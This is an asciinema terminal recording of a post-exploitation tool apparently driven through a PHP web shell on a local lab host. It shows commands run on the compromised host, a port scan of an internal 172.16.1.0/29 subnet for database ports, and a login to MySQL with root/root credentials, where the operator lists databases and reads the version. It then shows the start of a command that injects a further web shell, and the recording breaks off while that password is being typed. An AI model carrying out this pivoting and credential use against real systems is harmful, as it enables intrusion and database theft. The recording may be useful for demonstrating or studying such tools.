[23.775, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html >\u001b[23D\u001b[24C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[23.7758, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.2816, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[0;38;2;102;102;102mecon privesc\u001b[12D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.3433, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.4048, "o", "\u001b[?25l\u001b[?7l\u001b[0mm\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.4665, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.5283, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.5899, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32mremote\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.6521, "o", "\u001b[?25l\u001b[?7l\u001b[30D\u001b[0m\u001b[J\u001b[0;37;41;1m LOCAL \u001b[0m /var/www/html > \u001b[0;32mremote\u001b[30D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[25.6528, "o", "\u001b[95m[+] Bare commands now run on the target (the prompt shows REMOTE).\u001b[0m\r\n"]
[25.6533, "o", "\u001b[6n"]
[25.6539, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[25.6547, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.86, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.9217, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[26.9833, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.0449, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1066, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.1681, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.2297, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.2915, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.3531, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.4148, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.4764, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.5382, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.5999, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.6625, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.7251, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.7878, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.8505, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.9125, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.9742, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.0361, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.0981, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m7\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.1599, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.2218, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.2835, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.3459, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.4077, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.4695, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m1\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.5312, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m.\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.593, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m0\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.6549, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m/\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.7168, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.7787, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m9\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.8404, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.9022, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[28.9641, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.0258, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.0878, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.1495, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.2113, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.2731, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.3348, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.3967, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.4586, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5203, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m0\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.5821, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m6\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.6441, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m,\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.707, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m5\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.7688, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m4\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.8307, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.8926, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m2\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[29.9546, "o", "\u001b[?25l\u001b[?7l\u001b[75D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mscan\u001b[0m \u001b[0;31m--hosts\u001b[0m \u001b[0;33m172.16.1.0/29\u001b[0m \u001b[0;31m--ports\u001b[0m \u001b[0;33m3306,5432\u001b[75D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[29.9559, "o", "\u001b[95m[+] [portscan] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n\u001b[95m[+] Scanning 172.16.1.0/29 for [3306,5432] ...\u001b[0m\r\n"]
[32.9653, "o", "\u001b[1;32m[+] Open ports:\u001b[0m\r\n\u001b[1;32m172.16.1.2:3306 open\u001b[0m\r\n\u001b[1;32m172.16.1.3:5432 open\u001b[0m\r\n"]
[32.9658, "o", "\u001b[6n"]
[32.9666, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.9674, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.5544, "o", "\u001b[?25l\u001b[?7l\u001b[0mp\u001b[0;38;2;102;102;102mivot scan --hosts 172.16.1.0/29 --ports 3306,5432\u001b[49D\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.6173, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.6801, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.7427, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8048, "o", "\u001b[?25l\u001b[?7l\u001b[4D\u001b[0;32mpivot\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.8676, "o", "\u001b[?25l\u001b[?7l\u001b[0m \u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.9301, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[0m\u001b[K\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[34.9928, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.055, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.1172, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.1789, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.2411, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3032, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.3653, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mg\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.4276, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.4899, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.5518, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.6139, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.6757, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mm\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.7377, "o", "\u001b[?25l\u001b[?7l\u001b[0;33my\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.8003, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.8633, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.926, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[35.9885, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.0507, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.1128, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.1757, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.2375, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.2993, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.3612, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.4233, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.4853, "o", "\u001b[?25l\u001b[?7l\u001b[0;33md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.5469, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.609, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.6709, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.7327, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.7948, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.8568, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.9187, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[36.9804, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.0423, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.1046, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.1671, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.2295, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.2915, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.3537, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.4161, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.4786, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.5411, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.6034, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.6657, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.7282, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.7905, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.8527, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.9147, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[37.9768, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.0386, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.1008, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.1633, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.226, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.2882, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.3503, "o", "\u001b[?25l\u001b[?7l\u001b[86D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html > \u001b[0;32mpivot\u001b[0m \u001b[0;33mdb\u001b[0m \u001b[0;31m--engine\u001b[0m \u001b[0;33mmysql\u001b[0m \u001b[0;31m--host\u001b[0m \u001b[0;33mdb\u001b[0m \u001b[0;31m--user\u001b[0m \u001b[0;33mroot\u001b[0m \u001b[0;31m--password\u001b[0m \u001b[0;33mroot\u001b[86D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[38.3511, "o", "\u001b[95m[+] [database:mysql] POST http://127.0.0.1:8080/index.php (password='c')\u001b[0m\r\n"]
[38.3548, "o", "\u001b[1;32m[+] Connected.\u001b[0m\r\n"]
[38.3662, "o", "\u001b[6n"]
[38.3686, "o", "\u001b[?2004h\u001b[?1l\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[38.3725, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.7692, "o", "\u001b[?25l\u001b[?7l\u001b[0md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.8317, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.8942, "o", "\u001b[?25l\u001b[?7l\u001b[0mt\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[40.9564, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.0189, "o", "\u001b[?25l\u001b[?7l\u001b[0mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.0812, "o", "\u001b[?25l\u001b[?7l\u001b[0ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.1438, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.2063, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.2687, "o", "\u001b[?25l\u001b[?7l\u001b[8D\u001b[0;32mdatabases\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.3316, "o", "\u001b[?25l\u001b[?7l\u001b[16D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mdatabases\u001b[16D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[41.3376, "o", "\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\r\n\u2503\u001b[1;36m \u001b[0m\u001b[1;36mDatabase/Schema   \u001b[0m\u001b[1;36m \u001b[0m\u2503\r\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\r\n\u2502 mysql              \u2502\r\n\u2502 information_schema \u2502\r\n\u2502 performance_schema \u2502\r\n\u2502 sys                \u2502\r\n\u2502 benchmark          \u2502\r\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\r\n"]
[41.3383, "o", "\u001b[6n"]
[41.3393, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[41.3409, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.1488, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.211, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.2735, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.3352, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.3968, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.4583, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5199, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;32mversion\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5812, "o", "\u001b[?25l\u001b[?7l\u001b[14D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mversion\u001b[14D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5812, "o", "\u001b[?2004l"]
[43.586, "o", "\u001b[1;32m[+] 8.4.9\u001b[0m\r\n"]
[43.5868, "o", "\u001b[6n"]
[43.5879, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m >\u001b[6D\u001b[7C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[43.5893, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.0962, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.1588, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.2212, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.2833, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.3448, "o", "\u001b[?25l\u001b[?7l\u001b[11D\u001b[0m\u001b[J\u001b[0;37;44;1m DB \u001b[0m > \u001b[0;32mquit\u001b[11D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[45.3459, "o", "\u001b[6n"]
[45.3466, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m /var/www/html >\u001b[24D\u001b[25C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[45.3474, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.6564, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[0;38;2;102;102;102md\b\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.7181, "o", "\u001b[?25l\u001b[?7l\u001b[0mn\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.7798, "o", "\u001b[?25l\u001b[?7l\u001b[0mj\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.8416, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.9036, "o", "\u001b[?25l\u001b[?7l\u001b[0mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[46.9653, "o", "\u001b[?25l\u001b[?7l\u001b[5D\u001b[0;32minject\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.0272, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.0893, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.1515, "o", "\u001b[?25l\u001b[?7l\u001b[0;33me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.2136, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mb\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.2755, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.3375, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m-\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.3993, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.4611, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.5237, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ma\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.5864, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.6485, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.7109, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mw\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.7728, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.8348, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.8966, "o", "\u001b[?25l\u001b[?7l\u001b[0;31md\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[47.9584, "o", "\u001b[?25l\u001b[?7l\u001b[C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.0204, "o", "\u001b[?25l\u001b[?7l\u001b[0;33ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.0851, "o", "\u001b[?25l\u001b[?7l\u001b[0;33m3\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.1485, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mc\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[48.2113, "o", "\u001b[?25l\u001b[?7l\u001b[0;33mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
